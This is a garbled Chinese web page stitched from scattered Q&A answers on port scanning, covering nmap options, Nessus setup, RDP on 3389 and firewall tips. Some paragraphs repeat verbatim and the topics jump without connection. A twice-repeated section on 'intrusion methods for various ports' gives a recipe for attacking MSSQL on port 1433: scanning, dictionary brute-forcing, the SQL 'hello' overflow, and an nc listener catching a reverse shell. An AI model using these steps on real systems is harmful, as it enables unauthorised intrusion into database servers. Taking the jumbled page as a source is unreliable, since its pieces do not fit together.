常规端口扫描_单端口扫描实验

nmap端口扫描的问题(我是被扫描了)
如果你的诺顿提示已经拦截的话 那就没有问题了
估计是那些没事干的用工具在扫描端口玩罢了,只要你的诺顿拦截了就没有问题了,他们扫描端口 无非就是想看看你电脑有没有漏洞可以利用 想入侵你的电脑罢了,对你的电脑没有关系的,反正诺顿已经拦截了。
你说你的补丁全都打上了 那就行了 总搞端口扫描的差不多都是些小菜 对你没有威胁的,他入侵不了的。。
如果你的诺顿提示已经拦截的话 那就没有问题了
估计是那些没事干的用工具在扫描端口玩罢了,只要你的诺顿拦截了就没有问题了,他们扫描端口 无非就是想看看你电脑有没有漏洞可以利用 想入侵你的电脑罢了,对你的电脑没有关系的,反正诺顿已经拦截了。
你说你的补丁全都打上了 那就行了 总搞端口扫描的差不多都是些小菜 对你没有威胁的,他入侵不了的。。
有些端口专门就是木马入侵的端口,你可以看看,但建议你不要去攻击他人的电脑,这样不好,我列举几个常见的端口:
端口:0
服务:Reserved
说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
3389可以用XP自带的远程桌面连接工具进行连接具体步骤:开始--程序---附件--通讯--远程桌面连接 也可以用3389登陆器软件进行连接 你可以去这里下载 3389端口是一个远程桌面连接端口... 开放此端口可以远程连接此电脑进行操作... 下面的仅供参考: 现在3389端口已经没什么实在意义了.. 因为即使对方开了3389你没有用户名和密码还是登不上.. 只有用暴力破解....而且现在大多数人用的是XP系统 它不允许一个用户名同时登陆.... 还不如利用139.445端口呢...是不是进病毒啦?是不是显卡没插好 ?是不是被防火墙阻挡啦?本来不是这样的。还是找个明白人,亲自去为你调试吧。
安装nmap后(ubuntu通过apt-get install nmap安装),运行下列命令即可
nmap -p0-65535 目标ip地址
常用的扫描类型:
1、-sP(ping的方式扫描,检查主机在线与否,不发送任何报文到目的主机,想知道目标主机是否运行,而不想进行其它扫描,这扫描方式很常用)
2、-sL(仅仅列网段内出主机的状态、端口等信息,查询端口的话用 -p port,port1……)
如果你是用一个PC做代理,代理另一个PC上网的,就把那个代理的进程隐藏掉。网上很多隐藏进程的软件,下一个就行。然后隐藏那个进程。一般那个进程较syaserv。就是一个代理进程。要是用路由器,不想被别人扫描,那你设置ACL限制就好了。限制掉一些特殊的端口1080,应该是共享端口。
nmap(Network Mapper)是一款开放源代码的网络探测和安全审核工具。它用于快速扫描一个网络和一台主机开放的端口,还能使用TCP/IP协议栈特征探测远程主机的操作系统类型。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。Nmap最初是用于unix系统的命令行应用程序。在2000年的时候,这个应用程序有了windows版本,可以直接安装使用。
Nessus是一款扫面漏洞的软件,下面是一些简单的操作。
在打开linux之前先要打开终端在root用户下打出iptables -F关闭防火墙
之后在浏览器打出https://你的ip地址:8834.之后就可以进入nessus中
输入账户名密码就可进入。
进入之后的界面如下:
点new scan前面的加号新建
点下图
配置名字,在最下面加入你要扫寻漏洞的ip
各种端口的入侵方法
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
各种端口的入侵方法
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
服务TCP端口: 179
服务UDP端口: 88
分组延迟: 250
发现通行证: 1
ICMP协议执行ping的主机发现:有
主机的ICMP超时发现: 2000
TCP连接超时抢夺横幅: 8000
UDP连接超时抢夺横幅: 8000
服务扫描通行证: 1
主机解决通行证: 1
全连接的TCP扫描服务扫描:否